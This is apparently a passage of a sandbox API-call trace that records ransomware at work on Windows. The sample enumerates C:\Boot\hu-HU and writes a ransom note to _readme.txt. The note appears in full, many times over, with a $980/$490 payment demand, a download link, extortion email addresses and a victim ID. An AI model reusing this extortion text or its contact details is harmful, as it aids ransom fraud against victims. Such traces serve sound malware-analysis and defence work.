ftLastWriteTime.dwLowDateTime=0xa18cb460, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0093.981] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa18cb460, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa18cb460, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa18cb460, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0093.981] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0093.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fd20 | out: hHeap=0x630000) returned 1 [0093.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fd20 [0093.982] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0093.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0093.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x32cf950 [0093.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0093.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0093.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0093.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.986] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.986] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.986] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.986] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.986] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.986] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.986] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.986] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.986] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.986] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.986] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.986] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.986] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0093.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.988] PathFindFileNameW (pszPath="C:\\Boot\\hu-HU\\") returned="hu-HU\\" [0093.988] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0093.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.988] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0093.989] PathFindFileNameW (pszPath="") returned="" [0093.989] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0093.990] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0093.990] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x32faf28 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0093.990] FreeLibrary (hLibModule=0x75670000) returned 1 [0093.990] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.991] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32faf28 | out: hHeap=0x630000) returned 1 [0093.991] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0093.991] PathAppendW (in: pszPath="C:\\Boot\\hu-HU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 1 [0093.991] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.991] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0093.991] PathFileExistsW (pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 0 [0093.991] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x9ba4d90 [0093.991] lstrcpyW (in: lpString1=0x9ba4d90, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" [0093.992] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0093.992] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79fd8 [0093.992] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\_readme.txt" (normalized: "c:\\boot\\hu-hu\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0093.992] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x33515f0 [0093.993] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x853) returned 0x333bc58 [0093.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333bc58, cbMultiByte=2131, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1108 [0093.993] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x32d0db8 [0093.993] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.993] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33515f0 | out: hHeap=0x630000) returned 1 [0093.993] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1107 [0093.993] WriteFile (in: hFile=0x5c8, lpBuffer=0x32d0db8*, nNumberOfBytesToWrite=0x453, lpNumberOfBytesWritten=0x9e2fb64, lpOverlapped=0x0 | out: lpBuffer=0x32d0db8*, lpNumberOfBytesWritten=0x9e2fb64*=0x453, lpOverlapped=0x0) returned 1 [0093.994] CloseHandle (hObject=0x5c8) returned 1 [0093.995] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0093.995] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79fd8 | out: hHeap=0x630000) returned 1 [0093.995] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0093.995] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0093.995] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa18f15c0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa18f15c0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0093.996] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0093.996] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa18f15c0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa18f15c0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.996] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.996] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa18f15c0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa18f15c0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa18f15c0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0093.996] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa18f15c0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa18f15c0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa18f15c0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, 